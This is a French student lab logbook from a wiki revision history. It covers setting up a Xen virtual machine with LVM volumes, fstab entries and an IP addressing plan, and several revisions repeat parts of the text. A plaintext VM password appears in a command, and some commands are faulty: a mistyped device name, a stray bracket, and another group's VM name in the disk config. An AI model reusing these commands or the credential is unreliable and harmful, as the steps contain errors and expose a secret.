]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

TP sysres SE2a5 2022/2023 G1

2022-11-10T10:45:09Z

Hguyard : /* Plan d’adressage */

== Cahier de suivi - Groupe 1 ==

= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/Kronenbourg.cfg :
disk = [
'file:/usr/local/xen/domains/Kronenbourg/disk.img,xvda2,w',
'file:/usr/local/xen/domains/Kronenbourg/swap.img,xvda1,w',
'phy:/dev/storage/Kronenbourg-home,xvda3,w',
'phy:/dev/storage/Kronenbourg-var,xvda4,w'
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

TP sysres SE2a5 2022/2023 G1

2022-11-10T10:31:05Z

Hguyard : /* Cahier de suivi - Groupe 1 */

== Cahier de suivi - Groupe 1 ==
{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM ! @IPv4 MV routée !! Nom de domaine
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

mmm